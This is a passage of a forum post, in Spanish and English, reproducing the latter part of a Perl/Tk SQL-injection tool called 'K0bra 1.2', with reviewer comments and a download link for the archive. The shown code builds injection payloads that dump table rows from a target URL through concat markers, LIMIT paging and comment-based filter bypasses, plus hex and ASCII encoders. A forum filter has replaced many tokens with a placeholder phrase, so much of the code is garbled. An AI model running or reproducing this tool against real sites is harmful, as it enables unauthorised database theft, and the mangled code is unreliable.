  447. $max->Button(-width=>10,-text=>"Extract",-command=>\&tengor,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>360);
  448.  
  449. $max->Label(-text=>"Column1",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>100,-You are not allowed to view links. Register or Login=>180);
  450. $max->Label(-text=>"Column2",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>300,-You are not allowed to view links. Register or Login=>180);
  451.  
  452. my $duta1 = $max->Listbox(-width=>20,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>210,-x=>70);
  453. my $duta2 = $max->Listbox(-width=>23,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>210,-x=>260);
  454.  
  455.  
  # Reads count($col1) from the named table, then requests the two columns one
  # row at a time with "limit <n>,1", using the ERTOR854 marker as separator.
  # Each pair is shown in the two lists and appended to the log file.
  456. sub tengor {
  457.  
  458. $duta1->You are not allowed to view links. Register or Login("0.0","end");
  459. $duta2->You are not allowed to view links. Register or Login("0.0","end");
  460.  
  461. my $page = $tata->get;
  462. my $tabla = $tato->get;
  463. my $col1 = $tatu->get;
  464. my $col2 = $tita->get;
  465.  
  466. my $save = comer($page);
  467.  
  468. savefile($save.".txt","\n");
  469.  
  470. ($pass1,$pass2) = &bypass($bypass);
  471. if ($page=~/(.*)hackman(.*)/){
  472. my $start = $1;
  473. my $end = $2;
  # Table and column names are placed into the request text exactly as typed.
  474. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($col1),char(69,82,84,79,82,56,53,52))))";
  475. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$tabla.$pass2);
  476. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$col1,char(69,82,84,79,82,56,53,52),$col2,char(69,82,84,79,82,56,53,52))))";
  477. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
  478. $tota = $1;
  479. savefile($save.".txt","[Table] : $tabla");
  480. savefile($save.".txt","[+] Length of the rows: $tota\n");
  481. savefile($save.".txt","[$col1] [$col2]\n");
  # Inclusive range; the loop stops through `last` on the first response
  # that lacks the markers.
  482. for my $limit(0..$tota) {
  483. You are not allowed to view links. Register or Login $limit;
  # NOTE(review): $injection holds the response body here, not a request.
  484. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$tabla.$pass1."limit".$pass1.$limit.",1".$pass2);
  485. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
  486. savefile($save.".txt","[$col1] : $1   [$col2] : $2");
  487. $duta1->insert("end",$1);
  488. $duta2->insert("end",$2);
  489. } else {
  490. last;
  491. }}
  492. } else {
  493. msg("K0bra 1.2","Error");
  494. }}}}
  495.  
  # Callback for "Hex". Opens a small window with one text entry; "Encode"
  # replaces the entry text with encode() of it and "Decode" with decode().
  # NOTE(review): paso1 and paso2 are named subs declared inside per1, so they
  # stay bound to the $cam entry created by the first call of per1.
  496. sub per1 {
  497.  
  498. my $he = MainWindow->new(-background=>"black",-foreground=>"green");
  499. $he->title("Hex Converter (C) Doddy Hackman 2011");
  500. $he->geometry("420x70+20+20");
  501. $he->resizable(0,0);
  502. $he->Label(-text=>"Text : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  503. my $cam = $he->Entry(-width=>30,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  504. $he->Button(-text=>"Encode",-width=>10,-command=>\&paso1,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  505. $he->Button(-text=>"Decode",-width=>10,-command=>\&paso2,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  506.  
  # Encode button: entry text -> encode().
  507. sub paso1 {
  508.  
  509. my $caca = $cam->get();
  510. You are not allowed to view links. Register or Login $caca;
  511.  
  512. $cam->configure(-text=>encode($caca));
  513.  
  514. }
  515.  
  # Decode button: entry text -> decode().
  516. sub paso2 {
  517.  
  518. my $caca = $cam->get();
  519. You are not allowed to view links. Register or Login $caca;
  520.  
  521. $cam->configure(-text=>decode($caca));
  522.  
  523. }
  524. }
  525.  
  526.  
  # Callback for "ASCII". Opens a small window with one text entry; "Encode"
  # replaces the entry text with ascii() of it and "Decode" with ascii_de().
  # NOTE(review): paso3 and paso4 are named subs declared inside per2, so they
  # stay bound to the $cama entry created by the first call of per2.
  527. sub per2 {
  528.  
  529. my $hexae = MainWindow->new(-background=>"black",-foreground=>"green");
  530. $hexae->title("Ascii Converter (C) Doddy Hackman 2011");
  531. $hexae->geometry("420x70+20+20");
  532. $hexae->resizable(0,0);
  533. $hexae->Label(-text=>"Text : ",-font=>"Impact1",-background=>"black",-foreground=>"green")->place(-x=>20,-You are not allowed to view links. Register or Login=>20);
  534. my $cama = $hexae->Entry(-width=>30,-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>24,-x=>65);
  535. $hexae->Button(-text=>"Encode",-width=>10,-command=>\&paso3,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>255);
  536. $hexae->Button(-text=>"Decode",-width=>10,-command=>\&paso4,-activebackground=>"green",-background=>"black",-foreground=>"green")->place(-You are not allowed to view links. Register or Login=>20,-x=>325);
  537.  
  538.  
  # Encode button: entry text -> ascii().
  539. sub paso3 {
  540.  
  541. my $caca = $cama->get();
  542. You are not allowed to view links. Register or Login $caca;
  543.  
  544. $cama->configure(-text=>ascii($caca));
  545.  
  546. }
  547.  
  # Decode button: entry text -> ascii_de().
  548. sub paso4 {
  549.  
  550. my $caca = $cama->get();
  551. You are not allowed to view links. Register or Login $caca;
  552.  
  553. $cama->configure(-text=>ascii_de($caca));
  554.  
  555. }
  556.  
  557. }
  558.  
  # Callback for "Show Logs". Derives the log file name from the target entry
  # via comer() and hands the string "start logs/webs/<name>.txt" to a call
  # whose name is hidden by the forum placeholder.
  # NOTE(review): the file name comes from the typed URL and is interpolated
  # into a command string without quoting or validation. If the hidden call
  # runs that string through a shell, the URL text can alter the command that
  # is executed on the machine running this script; the name should be
  # restricted to host-name characters before it is used.
  559. sub china {
  560. my $de = $targetero->get;
  561. my $save = comer($de);
  562. my $file = $save.".txt";
  563. You are not allowed to view links. Register or Login("start logs/webs/$file");
  564. }
  565.  
  # Maps a style string in $_[0] to a pair of strings that callers assign to
  # ($pass1,$pass2): "/*" gives ("/**/","/*"), "%20" gives ("%20","%00"),
  # and anything else gives ("+","--"). Callers use $pass1 between words and
  # $pass2 at the end of the request. The token in front of each list is
  # hidden by the forum placeholder.
  566. sub bypass {
  567. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  568. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  569. else {You are not allowed to view links. Register or Login ("+","--");}}
  570.  
  # Converts the string in $_[0] for use inside char(...). Three tokens on the
  # body line are hidden by the forum placeholder; what remains visible is a
  # ',' separator and the template "U*".
  # NOTE(review): presumably yields the comma-separated code points of the
  # string, which is how callers use the result - confirm against the original.
  571. sub ascii {
  572. You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login ',',You are not allowed to view links. Register or Login "U*",$_[0];
  573. }
  574.  
  # Counterpart of ascii(); most tokens on the body line are hidden by the
  # forum placeholder.
  # NOTE(review): the result is assigned to $_[0], which aliases the caller's
  # variable, so the caller's argument is overwritten as a side effect.
  575. sub ascii_de {
  576. $_[0] = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login } You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[,],$_[0];
  577. You are not allowed to view links. Register or Login $_[0];
  578. }
  579.  
  580.  
  # Builds a "0x..." hex string from $_[0], one formatted value per element of
  # the loop. The loop source, the formatting call and its argument are hidden
  # by the forum placeholder; the format string "%x" is visible.
  # NOTE(review): "%x" does not zero-pad, so a value below 0x10 would add a
  # single digit and break the two-characters-at-a-time reading in decode().
  # NOTE(review): $hex is an undeclared package global.
  581. sub encode {
  582. my $string = $_[0];
  583. $hex = '0x';
  584. for (You are not allowed to view links. Register or Login //,$string) {
  585. $hex .= You are not allowed to view links. Register or Login "%x", You are not allowed to view links. Register or Login;
  586. }
  587. You are not allowed to view links. Register or Login $hex;
  588. }
  589.  
  # Reverses encode(): strips a leading "0x" and processes the rest two
  # characters at a time (the /../g match). The conversion calls are hidden by
  # the forum placeholder.
  # NOTE(review): the substitution edits $_[0] in place, which aliases the
  # caller's variable; $encode is an undeclared package global.
  590. sub decode {
  591. $_[0] =~ s/^0x//;
  592. $encode = You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login[], You are not allowed to view links. Register or Login { You are not allowed to view links. Register or Login You are not allowed to view links. Register or Login } $_[0] =~ /../g;
  593. You are not allowed to view links. Register or Login $encode;
  594. }
  595.  
  596.  
  # Fetches the URL in $_[0] with the shared $nave client and takes the
  # response's content; the token in front of the expression is hidden by the
  # forum placeholder.
  # NOTE(review): the response status is never checked, so the body of an
  # error or timeout response is handled like any other page.
  597. sub toma {
  598. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  599. }
  600.  
  # Appends the text in $_[1] plus a newline to logs/webs/<$_[0]>, using the
  # bareword handle SAVE. The three call names are hidden by the forum
  # placeholder.
  # NOTE(review): the mode ">>" and the path are joined into one string, and
  # the file name comes from the target URL via comer(), so its content is not
  # under the script's control; a separate mode argument and a name limited to
  # host-name characters would remove that dependency. No result is checked,
  # so a failed write passes silently.
  601. sub savefile {
  602. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  603. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  604. You are not allowed to view links. Register or Login SAVE;
  605. }
  606.  
  # Splits the URL in $_[0] with uri_split and uses its authority part; the
  # token in front of $auth is hidden by the forum placeholder. Callers use
  # the result as the base name of the log file.
  # NOTE(review): the authority part can carry more than a host name (for
  # example a port or user-info), and it is used in a file name unchanged.
  607. sub comer {
  608. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  609. You are not allowed to view links. Register or Login $auth;
  610. }
  611.  
  # Runs once at startup to prepare the log directories. The call name on the
  # two body lines is hidden by the forum placeholder.
  # NOTE(review): the test looks at the absolute path "/logs/webs" while the
  # two calls use the relative paths "logs/" and "logs/webs/", so the check
  # and the action refer to different locations.
  # NOTE(review): 777 is a decimal literal, not octal 0777; if it is a
  # permission mode, the resulting bits are not the ones the digits suggest.
  612. sub installer {
  613. unless (-d "/logs/webs") {
  614. You are not allowed to view links. Register or Login("logs/",777);
  615. You are not allowed to view links. Register or Login("logs/webs/",777);
  616. }
  617. }
  618.  
  # Shows a 200x50 status window titled $titulo with $contenido as its label,
  # using the same black/green colours as the main window.
  # NOTE(review): every call creates another MainWindow and calls MainLoop
  # again; nothing in this sub closes the window.
  619. sub msg {
  620.  
  621. my $color_fondo = "black"; #white
  622. my $color_letra = "green"; #black
  623.  
  624. my ($titulo,$contenido) = @_;
  625.  
  626. my $mensaje = MainWindow->new(-background=>$color_fondo,-foreground=>$color_letra);
  627. $mensaje->title($titulo);
  628. $mensaje->geometry("200x50+20+20");
  629. $mensaje->resizable(0,0);
  630. $mensaje->Label(-text=>$contenido,-font=>"Impact1",-background=>$color_fondo,-foreground=>$color_letra)->place(-You are not allowed to view links. Register or Login=>15,-x=>20);
  631.  
  632. MainLoop;
  633.  
  634. }
  635.  
  636. # ¿ The End ?
  637.  

Para bajar el script con el logo, lo pueden hacer desde acá:

Código: You are not allowed to view links. Register or Login
http://doddyhackman.webcindario.com/descargas/k0bra12.rar
« Última modificación: Marzo 14, 2015, 10:15:45 am por Expermicid »

 
